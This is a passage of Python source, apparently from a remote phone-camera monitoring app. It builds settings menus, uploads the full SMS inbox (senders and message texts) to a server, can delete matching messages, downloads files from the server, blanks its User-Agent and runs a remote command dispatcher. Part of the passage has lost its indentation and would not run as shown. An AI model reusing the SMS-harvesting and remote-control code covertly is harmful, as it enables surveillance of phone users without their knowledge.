        "  videoAudioEnabled = %s\n" % str(videoAudioEnabled) + \
        "  audioRecordDuration = %d" % audioRecordDuration)
    #localVideoMode is set before being used
    yesNoComboList = [u"No", u"Yes"]
    if ANDROID_OS:
        SetRecordDurationMenu_real(0)
        #TODO!!!! - choose from possible video resolutions
        TITLE_MENU = u"Mute video record?"
        try:
            # The UI asks "Mute?" while the flag stores "enabled", hence
            # the 1 - x inversions on both sides.
            videoAudioEnabled = 1 - DialogMultipleChoices(TITLE_MENU, \
                yesNoComboList, 1 - videoAudioEnabled)
            StoreState()
            #TODO!!!! - call also DisplayRedrawInfo()
        except:
            DebugPrint("Exception in RecordConfigMenu(). Bailing out...")
            DebugPrintErrorTrace()
        """
        DisplayNote("For simple microphone recording, select duration " \
            "from the Record Config menu.")
        # microphoneComboList[0]
        # (u"Main camera video mode", "combo", (localVideoModeComboList[0],
        #     localVideoModeIndex[0])),
        # (u"Mute video record", "combo", (yesNoComboList,
        #     1 - videoAudioEnabled)),
        """
        SetRecordDurationMenu_real(2)
    elif SYMBIAN_OS:
        """
        From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
        (and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
        """
        try:
            # Initialize a boolean variable to know whether the form is saved.
            recordConfigFormSaved = False
            localVideoModeComboList = [None, None]
            # (Tested a bit on phone with numCamerasSupported < 2)
            # Create a list to be used in "combo" selection mode.
            for cameraId in range(numCamerasSupported):
                localVideoModeComboList[cameraId] = []
                for videoMode in cameraVideoModes[cameraId]:
                    # print "resPhoto[0] = ", resPhoto[0]
                    # print "resPhoto[1] = ", resPhoto[1]
                    """
                    localVideoModeComboList[cameraId] += [u"(%d, %d, %.1f)" \
                        % (videoMode["size"][0],
                        videoMode["size"][1], videoMode["rate"])]
                    """
                    localVideoModeComboList[cameraId].append( \
                        u"(%d x %d @ %.0f fps)" % (videoMode["size"][0], \
                        videoMode["size"][1], videoMode["rate"]) )
        except:
            DebugPrintErrorTrace()
        try:
            # Field order below is load-bearing: the saved form is read
            # back by index in the recordConfigFormSaved branch.
            myFields = []
            if numCamerasSupported >= 1:
                myFields = [
                    (u"Main camera record duration", "number",
                        videoRecordDuration[0]),
                    (u"Main camera video mode", "combo",
                        (localVideoModeComboList[0], localVideoModeIndex[0]))
                ]
            if numCamerasSupported == 2:
                myFields += [
                    (u"VGA camera record duration", "number",
                        videoRecordDuration[1]),
                    (u"VGA camera video mode", "combo",
                        (localVideoModeComboList[1], localVideoModeIndex[1]))
                ]
            myFields += [
                (u"Mute video record", "combo",
                    (yesNoComboList, 1 - videoAudioEnabled)),
                (u"Microphone record duration", "number",
                    audioRecordDuration)
            ]
            # appuifw.app.title = u"Select Record Durations"
            appuifw.app.title = u"Record Config"
            # Creates the form
            """
            recordConfigForm = appuifw.Form(myFields,
                flags=appuifw.FFormEditModeOnly)
            """
            #recordConfigForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            #recordConfigForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
            recordConfigForm = appuifw.Form(myFields,
                appuifw.FFormEditModeOnly | \
                appuifw.FFormDoubleSpaced)
            # Define a function to be called when the form is saved.
            def RecordConfigFormSaved(arg):
                global recordConfigFormSaved, canvas
                recordConfigFormSaved = True
                # appuifw.app.body = canvas
                RedrawHandler(None)
                return True
            # Assign the save function
            recordConfigForm.save_hook = RecordConfigFormSaved
            #Show the form. This operation is blocking until we close the form.
            recordConfigForm.execute()
            # After the form is saved and closed, display the information.
            if recordConfigFormSaved == True:
                # print recordConfigForm[0][2]
                """
                appuifw.note(unicode("Google Username: " +
                    recordConfigForm[0][2]), "info")
                videoRecordDuration[0] = ...
                videoRecordDuration[1] = recordConfigForm[1][2]
                audioRecordDuration = recordConfigForm[2][2]
                """
                """
                The combo form field value is a long integer.
                We convert it to int because we would receive
                "TypeError: Form combo field, bad index" at the next
                instantiation of appuifw.Form().
                """
                # NOTE(review): this readback assumes all six fields exist,
                # i.e. numCamerasSupported == 2 — confirm the menu is only
                # reachable on two-camera devices.
                SetRecordDuration(0, int(recordConfigForm[0][2]))
                localVideoModeIndex[0] = int(recordConfigForm[1][2][1])
                videoMode = cameraVideoModes[0][localVideoModeIndex[0]]
                localVideoMode[0] = ((videoMode["size"][0],
                    videoMode["size"][1]),
                    videoMode["rate"])
                DebugPrint("RecordConfigMenu(): localVideoMode[0] = %s." % \
                    str(localVideoMode[0]))
                SetRecordDuration(1, int(recordConfigForm[2][2]))
                localVideoModeIndex[1] = int(recordConfigForm[3][2][1])
                videoMode = cameraVideoModes[1][localVideoModeIndex[1]]
                localVideoMode[1] = ((videoMode["size"][0],
                    videoMode["size"][1]), videoMode["rate"])
                DebugPrint("RecordConfigMenu(): localVideoMode[1] = %s." % \
                    str(localVideoMode[1]))
                videoAudioEnabled = 1 - int(recordConfigForm[4][2][1])
                SetRecordDuration(2, int(recordConfigForm[5][2]))
                StoreState()
        except:
            DebugPrintErrorTrace()
        """
        # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5)
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        # Restore the app title (finally: is avoided for Python 2.2 compat).
        appuifw.app.title = ICAM_APP_TITLE
# This var is required as global: the nested save_hook callback inside
# CaptureWhatMenu() sets it so the menu knows the form was saved.
cameraModesFormSaved = False
def CaptureWhatMenu():
    """Choose what each camera captures and which sensors are read.

    Android: only the main camera mode is selectable via a dialog.
    Symbian: shows an appuifw Form with per-camera mode combos
    (None/Video/Photo/Both), a GPS combo (enabled only on whitelisted
    IMEIs) and an accelerometer/rotation combo; on save the values are
    read back BY POSITION and GPS is started/stopped accordingly.
    """
    global cameraModesFormSaved
    global cameraMode, readGPS, logAccelerometerAndRotationSensors
    DebugPrint("Entered CaptureWhatMenu().")
    """
    From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
    (and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
    """
    # u"Media Storage"
    TITLE_MENU = u"Capture What"
    # Index into this list is the cameraMode value itself.
    cameraModesComboList = [u"None", u"Video", u"Photo",
        u"Both photo and video"]
    microphoneComboList = [u"[Select duration from Record Config]"]
    if ANDROID_OS:
        # resMenu = None
        try:
            cameraMode[0] = DialogMultipleChoices(TITLE_MENU, \
                cameraModesComboList, int(cameraMode[0]))
            # val = int(DialogGetInput(myText, "[seconds]", str(initVal)))
            StoreState()
        except:
            DebugPrint("Exception in CaptureWhatMenu(). Bailing out...")
            DebugPrintErrorTrace()
        DisplayNote("For simple microphone recording, select duration from " \
            "the Record Config menu.") # microphoneComboList[0]
    elif SYMBIAN_OS:
        try:
            # Initialize a boolean variable to know whether the form is saved.
            cameraModesFormSaved = False
            notAvailableComboList = [u"Not Available"]
            noComboList = [u"No"]
            yesNoComboList = [u"No", u"Yes"]
            # Samsung, Nokia E7, 6120 and N82.
            # Only devices known to have working GPS get a Yes option.
            if deviceId in [IMEI_G810, IMEI_E7, IMEI_N95, IMEI_N82]:
                gpsComboList = yesNoComboList
            else:
                gpsComboList = noComboList
            # Assuming numCamerasSupported == 2.
            # Field order is load-bearing: values are read back by index
            # in the cameraModesFormSaved branch below.
            myFields = [(u"Main camera", "combo",
                    (cameraModesComboList, cameraMode[0])),
                (u"VGA camera", "combo",
                    (cameraModesComboList, cameraMode[1])),
                (u"Microphone", "combo", (microphoneComboList, 0)),
                (u"Read GPS coordinates", "combo",
                    (gpsComboList, readGPS)),
                # (u"Read GPS coordinates", "combo",
                #     (noComboList, readGPS)),
                (u"Accelerometer & Rotation", "combo",
                    (noComboList, logAccelerometerAndRotationSensors))]
            #(u"Accelerometer & Rotation", "combo", (yesNoComboList,
            #    logAccelerometerAndRotationSensors))
            # Replace camera fields with "Not Available" when missing.
            if numCamerasSupported == 0:
                myFields[0] = (u"Main camera", "combo",
                    (notAvailableComboList, 0))
            if numCamerasSupported < 2:
                myFields[1] = (u"VGA camera", "combo",
                    (notAvailableComboList, 0))
            appuifw.app.title = TITLE_MENU
            # Creates the form
            """
            durationForm = appuifw.Form(myFields,
                flags=appuifw.FFormEditModeOnly)
            """
            # durationForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            """
            cameraModesForm = appuifw.Form(myFields,
                appuifw.FFormDoubleSpaced)
            """
            cameraModesForm = appuifw.Form(myFields,
                appuifw.FFormEditModeOnly
                | appuifw.FFormDoubleSpaced)
            # Define a function to be called when the form is saved
            def CameraModeFormSaved(arg):
                global cameraModesFormSaved
                cameraModesFormSaved = True
                return True
            # Assign the save function
            cameraModesForm.save_hook = CameraModeFormSaved
            #Show the form. This operation is blocking until we close the form.
            cameraModesForm.execute()
            # After the form is saved and closed, display the information.
            if cameraModesFormSaved == True:
                # print durationForm[0][2]
                """
                appuifw.note(unicode("Google Username: " +
                    durationForm[0][2]), "info")
                """
                """
                The combo form field value is a long integer. We convert it to
                int because we would receive
                "TypeError: Form combo field, bad index"
                at the next instantiation of appuifw.Form().
                """
                cameraMode[0] = int(cameraModesForm[0][2][1])
                cameraMode[1] = int(cameraModesForm[1][2][1])
                readGPS = int(cameraModesForm[3][2][1])
                #if phoneModel in ["NokiaN95", "NokiaN82", "NokiaN8",
                #    "NokiaE7"]:
                if readGPS:
                    StartGPS()
                else:
                    StopGPS()
                StoreState()
        except:
            DebugPrintErrorTrace()
        """
        # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        # Restore the app title (finally: is avoided for Python 2.2 compat).
        appuifw.app.title = ICAM_APP_TITLE
    DebugPrint("Exiting CaptureWhatMenu().")
def SetPhotoQuality_real(aQuality):
    """Set the JPEG quality used for captured photos.

    aQuality must be in 0..100 (inclusive); anything else is silently
    ignored. A valid value is persisted through StoreState().
    """
    global photoQuality
    if 0 <= aQuality <= 100:
        photoQuality = aQuality
        StoreState()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aQualityIndex parameter.
"""
SetPhotoQuality = lambda aQuality: lambda : \
SetPhotoQuality_real(aQuality)
photoFormSaved = False # This var is required as global.
def PhotoConfigMenu():
    """Configure local/uploaded photo resolutions and JPEG quality.

    Symbian only. Shows an appuifw Form with per-camera local-resolution
    combos (built from the camera's supported sizes), one shared
    sent-resolution combo and a numeric quality field; on save the
    fields are read back BY POSITION, so the readback indices must
    match the order in which myFields is built.
    """
    global photoFormSaved
    global localPhotoResolutionIndex, photoResolutionIndex, photoQuality
    DebugPrint("Entered PhotoConfigMenu().")
    if SYMBIAN_OS:
        """
        From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
        (and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
        """
        try:
            # Initialize a boolean variable to know whether the form is saved.
            photoFormSaved = False
            localComboList = [None, None]
            # sentComboList = [None, None]
            sentComboList = None
            # Create a list to be used in "combo" selection mode.
            for cameraId in range(numCamerasSupported):
                localComboList[cameraId] = []
                # This is IMPORTANT
                # The main camera's size table depends on the pixel format
                # the device supports; the VGA camera is always RGB24.
                if cameraId == 0:
                    if phoneModel == "SamsungSGH-G810":
                        cameraPhotoSizes = \
                            cameraPhotoSizes_RGB24[0]
                    else:
                        cameraPhotoSizes = \
                            cameraPhotoSizes_JPEG_Exif[0]
                elif cameraId == 1:
                    cameraPhotoSizes = cameraPhotoSizes_RGB24[1]
                for resPhoto in cameraPhotoSizes:
                    """
                    Example:
                        cameraPhotoSizes_JPEG_Exif[0] = [
                            (2592, 1944),
                            (2048, 1536),
                            (1600, 1200),
                            (1024, 768),
                            (640, 480)
                        ]
                    """
                    # print "resPhoto[0] = ", resPhoto[0]
                    # print "resPhoto[1] = ", resPhoto[1]
                    localComboList[cameraId].append( u"(%d, %d)" % \
                        (resPhoto[0], resPhoto[1]) )
                DebugPrint( "PhotoConfigMenu(): localComboList[%d] = %s." % \
                    (cameraId, str(localComboList[cameraId])) )
            sentComboList = []
            """
            Example:
                cameraPhotoSizes_JPEG_Exif[0] = [
                    (2592, 1944), (2048, 1536),
                    (1600, 1200), (1024, 768),
                    (640, 480)
                ]
            """
            for resPhoto in photoResolutionStr:
                # print "resPhoto[0] = ", resPhoto[0]
                # print "resPhoto[1] = ", resPhoto[1]
                sentComboList.append( u"%s" % resPhoto[0] )
            DebugPrint( "PhotoConfigMenu(): sentComboList = %s." % \
                str(sentComboList) )
            # Field order is load-bearing: see the readback below.
            # NOTE(review): with numCamerasSupported == 0, myFields is
            # never created and the += below would raise NameError —
            # presumably this menu is unreachable without a camera.
            if numCamerasSupported >= 1:
                """
                (u"", "text", \
                    u"Local Photo Resolution (Each camera)"),
                (u"Local Photo Resolutions", \
                    "text", u""),
                (u"Main camera", "number", \
                    videoRecordDuration[0]),
                (u"Main camera", "combo", (localComboList[0], \
                    localPhotoResolutionIndex[0]))]
                """
                myFields = [ \
                    ( u"Local Photo Resolutions - Main camera", \
                        "combo", (localComboList[0], \
                        localPhotoResolutionIndex[0]) ) \
                ]
            if numCamerasSupported == 2:
                """
                (u"VGA camera", "combo", (localComboList[1], \
                    localPhotoResolutionIndex[1]))]
                """
                myFields += [ \
                    ( u"Local Photo Resolutions - VGA camera", \
                        "combo", (localComboList[1], \
                        localPhotoResolutionIndex[1]) ) \
                ]
            else:
                # (u"VGA camera", "text", u"n/a")]
                myFields += [ \
                    ( u"Local Photo Resolutions - VGA camera", \
                        "text", u"[N/A]" )]
            if numCamerasSupported >= 1:
                """
                (u"", "text", \
                    u"Sent Photo Resolution (Both cameras)"),
                """
                myFields += [ \
                    ( u"Sent Photo Resolution - Both cameras", \
                        "combo", (sentComboList, \
                        photoResolutionIndex) ) ]
            """
            if numCamerasSupported == 2:
                myFields += [ \
                    (u"VGA", "combo", (sentComboList[1], \
                        photoResolutionIndex[1]))]
            else:
                myFields += [
                    (u"VGA", "text", u"")]
            """
            if numCamerasSupported >= 1:
                # (u"", "text", u"Sent Photo Quality"),
                myFields += [ \
                    ( u"Sent Photo Quality - Both cameras", \
                        "number", photoQuality ) ]
            DebugPrint("PhotoConfigMenu(): myFields = %s." % str(myFields))
            appuifw.app.title = u"Photo Config"
            # Creates the form.
            #photoForm = appuifw.Form(myFields,flags=appuifw.FFormEditModeOnly)
            #photoForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            #photoForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
            photoForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly | \
                appuifw.FFormDoubleSpaced)
            # Define a function to be called when the form is saved.
            def PhotoFormSaved(arg):
                global photoFormSaved
                photoFormSaved = True
                return True
            # Assign the save function
            photoForm.save_hook = PhotoFormSaved
            #Show the form. This operation is blocking until we close the form.
            photoForm.execute()
            # After the form is saved and closed, display the information
            if photoFormSaved == True:
                #print photoForm[0][2]
                #appuifw.note(unicode("Google Username: " + photoForm[0][2]),
                #    "info")
                """
                The combo form field value is a long integer. We convert it to
                int because we would receive
                "TypeError: Form combo field, bad index"
                at the next instantiation of appuifw.Form().
                """
                localPhotoResolutionIndex[0] = int(photoForm[0][2][1])
                if numCamerasSupported == 2:
                    localPhotoResolutionIndex[1] = int(photoForm[1][2][1])
                photoResolutionIndex = int(photoForm[2][2][1])
                SetLocalPhotoResolution()
                """
                DebugPrint("PhotoConfigMenu(): " \
                    "localPhotoResolutionIndex[0] = %d, " \
                    "len(cameraPhotoSizes) = %d." % \
                    (cameraId, localPhotoResolutionIndex[0],
                    len(cameraPhotoSizes)))
                selectionListResolution = []
                for i in range(len(cameraPhotoSizes)):
                    if i == localPhotoResolutionIndex[cameraId]:
                        selectionListResolution += [unicode(MENU_SELECT_PREFIX)
                            + unicode(cameraPhotoSizes[i])]
                    else:
                        selectionListResolution += \
                            [unicode(cameraPhotoSizes[i])]
                index = appuifw.selection_list(selectionListResolution, 0)
                if index is not None:
                    SetLocalPhotoResolutionIndex(index)()
                """
                photoQuality = int(photoForm[3][2])
                StoreState()
        except:
            DebugPrintErrorTrace()
        """
        # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        # Restore the app title (finally: is avoided for Python 2.2 compat).
        appuifw.app.title = ICAM_APP_TITLE
def UploadInboxSMSes(cleanUndesiredSMSes=False):
    """Dump the Symbian SMS inbox to a text file and upload it.

    Builds an HTML-ish report (id, sender, content, timestamp per SMS),
    writes it under LOCAL_FOLDER, uploads it to the iCam server and
    moves it into the sent-logs folder. When cleanUndesiredSMSes is
    True, operator spam matching a hard-coded Romanian prefix is
    deleted from the inbox. Every per-message step is individually
    wrapped in try/except so one bad message cannot abort the dump;
    failures are appended to the report instead. No-op unless running
    on Symbian with the inbox module imported.
    """
    global deviceId
    global inboxIsImported
    DebugPrint("Entered UploadInboxSMSes(): inboxIsImported = %d." % \
        inboxIsImported)
    if SYMBIAN_OS:
        if inboxIsImported == False:
            return
        try:
            myMailbox = inbox.Inbox(inbox.EInbox)
            messageIdList = myMailbox.sms_messages()
            myText = "The phone Inbox has %d SMSes.<br/>\n" % \
                len(messageIdList)
            myText += "The phone Inbox SMSes have message IDs: " + \
                str(messageIdList) + "<br/>\n"
            messageCounter = 0
            for messageId in messageIdList:
                # Each field read is best-effort: on failure the report
                # records the exception and moves on.
                try:
                    myText += "  " + str(messageId) + "<br/>\n"
                except:
                    (exceptionType, exceptionValue, exceptionTraceback) = \
                        sys.exc_info()
                    myText += "Exception: exceptionTraceback = %s, " \
                        "exceptionType = %s, " \
                        "exceptionValue = %s.<br/>\n" % \
                        (repr(traceback.format_tb(exceptionTraceback)),
                        str(exceptionType), str(exceptionValue))
                    DebugPrintErrorTrace()
                try:
                    myText += "  " + myMailbox.address(messageId) + "<br/>\n"
                except:
                    (exceptionType, exceptionValue, exceptionTraceback) = \
                        sys.exc_info()
                    myText += "Exception: exceptionTraceback = %s, " \
                        "exceptionType = %s, " \
                        "exceptionValue = %s.<br/>\n" % \
                        (repr(traceback.format_tb(exceptionTraceback)),
                        str(exceptionType), str(exceptionValue))
                    DebugPrintErrorTrace()
                try:
                    myText += "  " + myMailbox.content(messageId) + "<br/>\n"
                except:
                    (exceptionType, exceptionValue, exceptionTraceback) = \
                        sys.exc_info()
                    myText += "Exception: exceptionTraceback = %s, " \
                        "exceptionType = %s, " \
                        "exceptionValue = %s.<br/>\n" % \
                        (repr(traceback.format_tb(exceptionTraceback)),
                        str(exceptionType), str(exceptionValue))
                    DebugPrintErrorTrace()
                try:
                    myText += "  " + time.ctime(myMailbox.time(messageId)) \
                        + "<br/>\n"
                except:
                    (exceptionType, exceptionValue, exceptionTraceback) = \
                        sys.exc_info()
                    myText += "Exception: exceptionTraceback = %s, " \
                        "exceptionType = %s, " \
                        "exceptionValue = %s.<br/>\n" % \
                        (repr(traceback.format_tb(exceptionTraceback)),
                        str(exceptionType), str(exceptionValue))
                    DebugPrintErrorTrace()
                if cleanUndesiredSMSes:
                    try:
                        if str(myMailbox.content(messageId)).startswith( \
                                "Serviciul de date este deja activ."):
                            """
                            if str(myMailbox.address(messageId)) == "302" and
                                str(myMailbox.content(messageId)).startswith(
                                "Serviciul de date este deja activ."):
                            """
                            DebugPrint("UploadInboxSMSes(): deleting message " \
                                "with messageId = %d since it " \
                                "corresponds to cleaning criteria." % \
                                messageId)
                            myMailbox.delete(messageId)
                    except:
                        (exceptionType, exceptionValue, exceptionTraceback) = \
                            sys.exc_info()
                        myText += "Exception: exceptionTraceback = %s, " \
                            "exceptionType = %s, " \
                            "exceptionValue = %s.<br/>\n" % \
                            (repr(traceback.format_tb(
                                exceptionTraceback)),
                                str(exceptionType), str(exceptionValue))
                        DebugPrintErrorTrace()
                messageCounter += 1
            # Drop non-ASCII characters so the report writes/uploads cleanly.
            try:
                myText = myText.encode("ascii", "ignore")
            except:
                (exceptionType, exceptionValue, exceptionTraceback) = \
                    sys.exc_info()
                myText += "Exception: exceptionTraceback = %s, " \
                    "exceptionType = %s, " \
                    "exceptionValue = %s.<br/>\n" % \
                    (repr(traceback.format_tb(exceptionTraceback)),
                    str(exceptionType), str(exceptionValue))
                DebugPrintErrorTrace()
            # myText = str(myText)
            myDateTime = GetCurrentDateTimeStringWithMilliseconds()
            """
            myDateTime = time.strftime("%Y_%m_%d_%H_%M_%S",
                GetCurrentDateTime())
            """
            fileName = "SMSes_Inbox_" + myDateTime + ".txt"
            pathFileName = LOCAL_FOLDER + "/" + fileName
            fOutput = open(pathFileName, "wb")
            fOutput.write(myText)
            fOutput.close()
            try:
                if not os.path.exists(LOCAL_FOLDER_SENT_LOGS):
                    os.makedirs(LOCAL_FOLDER_SENT_LOGS)
            except:
                DebugPrintErrorTrace()
            """
            if UploadFile(pathFileName, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_FILE) != -1:
                MoveFileBetweenAnyDrives(pathFileName,
                    LOCAL_FOLDER_SENT_LOGS + "/" + fileName)
            """
            # NOTE(review): the file is moved to SentLogs even if the
            # upload failed — the commented-out variant above checked the
            # upload result first; confirm this is intentional.
            UploadFile(pathFileName, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_FILE)
            MoveFileBetweenAnyDrives(pathFileName,
                LOCAL_FOLDER_SENT_LOGS + "/" + fileName)
            """
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
            """
        except:
            (exceptionType, exceptionValue, exceptionTraceback) = \
                sys.exc_info()
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId,
                    "Exception in UploadInboxSMSes() - details: " \
                    "free_ram = %d. exceptionTraceback = %s, " \
                    "exceptionType = %s, exceptionValue = %s. " \
                    "Bailing out..." %
                    (GetFreeRAM(),
                    repr(traceback.format_tb(exceptionTraceback)),
                    str(exceptionType), str(exceptionValue)),
                    ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
            DebugPrint("Exception in UploadInboxSMSes(). Bailing out...")
            DebugPrintErrorTrace()
"""
Not much used - ex use: employ it to receive a .WAV file from the
server to be played on the phone script (e.g., an updated iCam.Py script)
and run it, an extension, etc.
"""
def DownloadFile(fileName):
global ICAM_SERVER_NAME, accessPointName
global deviceId
if NoInternetConnection():
return
try:
PetWatchdog()
dataCompressed = urllib.urlopen("http://" + ICAM_SERVER_NAME + \
WEBPAGE_DL_GZIPPED_FILE + "?deviceId=" + deviceId + \
"&filename=" + fileName).read()
dataUncompressed = dataCompressed.decode("zlib")
LOCAL_FOLDER_FILES_FROM_SERVER = LOCAL_FOLDER + "/FilesFromServer"
try:
if not os.path.exists(LOCAL_FOLDER_FILES_FROM_SERVER):
os.makedirs(LOCAL_FOLDER_FILES_FROM_SERVER)
except:
DebugPrintErrorTrace()
fOutput = open(LOCAL_FOLDER_FILES_FROM_SERVER + "/" + fileName, "wb")
fOutput.write(dataUncompressed)
fOutput.close()
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in DownloadFile. Details: time = %s, " \
"free_ram = %d. %s." % \
(GetCurrentDateTimeStringNice(), GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
if MY_DEBUG_STDERR:
# traceback.print_exc()
sys.stderr.write(myText + "\n")
sys.stderr.flush()
"""
Change User-Agent
(see http://docs.python.org/library/urllib.html and
http://diveintopython3.org/http-web-services.html).
By default urllib.urlopen sends a User-Agent string "Python-urllib/1.17"
(see /var/log/apache2/access.log for log entries when it calls cmd.php).
"""
class AppURLopener(urllib.FancyURLopener):
version = ""
urllib._urlopener = AppURLopener()
# Helper iterator needed only on Python 2.2 (e.g., PyS60 1.4.5).
# (Earlier guard variants: S60_EDITION[0] < 3 / SYMBIAN_S60_2ND_ED.)
if sys.version_info[0 : 2] == (2, 2):
    class MyListIterClass:
        """Minimal forward iterator over a list for Python 2.2.

        Python 2.2.2 lists lack a usable __iter__ (despite what the
        2.5-era docs and PEP 234 suggest), so ExecuteCommands() walks
        command lines through this wrapper's next() and
        __length_hint__(). Defined at module level: nesting it inside
        ExecuteCommands() triggers "SyntaxError: unqualified exec is
        not allowed ..." on 2.2.
        """
        def __init__(self, aList):
            self._items = aList
            self._pos = 0
        def next(self):
            """Return the next element, or raise StopIteration."""
            try:
                value = self._items[self._pos]
            except IndexError:
                raise StopIteration
            self._pos += 1
            return value
        def __length_hint__(self):
            """Return how many elements have not been consumed yet."""
            return len(self._items) - self._pos
def ExecuteCommands(cmdString, fastExec=False):
    """Parse and execute a newline-separated batch of remote-control commands.

    Each line of cmdString is one command: the first space-separated token is
    the command name, the rest are its arguments.  Most commands mutate the
    module-level configuration globals declared below.  Returns False when
    cmdString is empty/too short or cannot be split into lines, True after
    the batch has been processed (per-command exceptions are logged and the
    loop continues with the next command).
    """
    global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
        MY_DEBUG_UPLOAD_MSG
    global MAX_NUM_HOTSPOTS
    global deviceId, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT
    global modeManagerIsEnabled
    global internetUploadMaxErrors
    global NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS
    global uploadUnsentData
    global saveUnsentPackets
    global uploadHowManyOfLatestBluetoothMessages
    global pauseIntervalGdata
    global BATTERY_LEVEL_THRESHOLD
    global cameraMode
    global exposureIndex
    global whiteBalanceIndex
    global flashIndex
    global videoAudioEnabled
    global localVideoModeIndex, localVideoMode, cameraVideoModes
    global localPhotoResolutionIndex
    global bluetoothMode
    global bluetoothServerAddress
    global burstModeIsStarted
    global numHotspots
    global differentPixelsPercentageThreshold
    global hotspot
    global storeLocallyMedia
    global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
    global googleUsername
    global googlePasswordEncrypted
    global googleKeywords
    global googleMediaPrivate
    global dawnTimeVec
    global duskTimeVec
    # Reject empty or trivially short command strings.
    if (cmdString is None) or (len(cmdString) < 5):
        return False
    # fastExec skips the (potentially slow) logging/upload of the raw batch.
    if fastExec == False:
        myText = "ExecuteCommands(): Received commands at %s: %s." % \
            (GetCurrentDateTimeStringNice(), cmdString)
        DebugPrint(myText)
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
    try:
        lineList = cmdString.splitlines()
    except:
        DebugPrintErrorTrace()
        return False
    #res = 0
    # Python 2.2 does not have iterator for list, so we create a helper class.
    # (S60_EDITION[0] < 3)):
    #if SYMBIAN_OS and SYMBIAN_S60_2ND_ED:
    if sys.version_info[0 : 2] == (2, 2):
        cmdIterator = MyListIterClass(lineList)
    else:
        cmdIterator = lineList.__iter__()
    """
    Inspired from
    http://stackoverflow.com/questions/1292189/how-does-python-for-loop-work
    while True:
        try:
            line = cmdIterator.next()
        except StopIteration:
            # StopIteration exception is raised after last element
            break
        print cmdIterator.__length_hint__()
        # loop code
        print line
    """
    """
    Python doesn't have hasNext() method - see
    http://stackoverflow.com/questions/1966591/hasnext-in-python-iterators
    """
    # Manual iteration (instead of a for loop) so that the
    # "send-commands-via-bluetooth" branch below can consume extra lines
    # from the same iterator.
    while cmdIterator.__length_hint__() > 0:
        try:
            cmdLine = cmdIterator.next()
            # print cmdIterator.__length_hint__()
            tokens = cmdLine.split(" ")
            DebugPrint("ExecuteCommands(): tokens = %s." % str(tokens))
            # Dispatch on the command name (tokens[0]).
            if tokens[0] == "quit-application":
                Quit()
            elif tokens[0] == "restart-phone":
                RestartPhone()
            elif tokens[0] == "set-startAutomatically":
                """
                I think it is not a good idea to do have it since we don't
                want to give the possibility to control remotely the
                device.
                global startAutomatically
                startAutomatically = int(tokens[1])
                """
                pass
            elif tokens[0] == "set-internetUploadMaxErrors":
                internetUploadMaxErrors = int(tokens[1])
            elif tokens[0] \
                == "set-NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS":
                NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS = \
                    int(tokens[1])
            elif tokens[0] == "set-uploadUnsentData":
                """
                Note: 0 - send none; 1 - send unsent files from Unsent;
                2 - send unsent logs; 3 - send ALL
                """
                uploadUnsentData = int(tokens[1])
            elif tokens[0] == "set-saveUnsentPackets":
                """
                # 0 - None, 1 - All; 2 - wo .txm
                """
                saveUnsentPackets = int(tokens[1])
            elif tokens[0] == "upload-how-many-of-latest-bluetooth-messages":
                """
                Note: 0 - don't upload, if -1 - upload all BUT in chrono order,
                if > 0 then upload that many latest.
                """
                uploadHowManyOfLatestBluetoothMessages = int(tokens[1])
            elif tokens[0] == "send-file-via-bluetooth":
                BluetoothClientDiscoverServer(tokens[1])
                #!!!!TODO
                """
                BluetoothUploadGZippedData(tokens[1],
                    cmdLine[len(tokens[0]) + len(tokens[1]) + 2:],
                    COMMANDS_FILENAME, newMode=NEW_BT_FORMAT)
                """
            elif tokens[0] == "send-command-via-bluetooth":
                """
                Note that BluetoothUploadGZippedData() calls also the
                BluetoothClientDiscoverServer(), but since we are
                normally executing this command from the BT server and
                it can send commands to several BT clients, then need to
                reinitialize each time bluetoothServerOPPServicePort -
                we normally don't recompute it otherwise, since we assume
                the phone is BT client.
                """
                BluetoothClientDiscoverServer(tokens[1])
                BluetoothUploadGZippedData(tokens[1],
                    cmdLine[len(tokens[0]) + len(tokens[1]) + 2:],
                    COMMANDS_FILENAME, newMode=NEW_BT_FORMAT)
            elif tokens[0] == "send-commands-via-bluetooth":
                # print tokens[2:]
                # print tokens[2:]
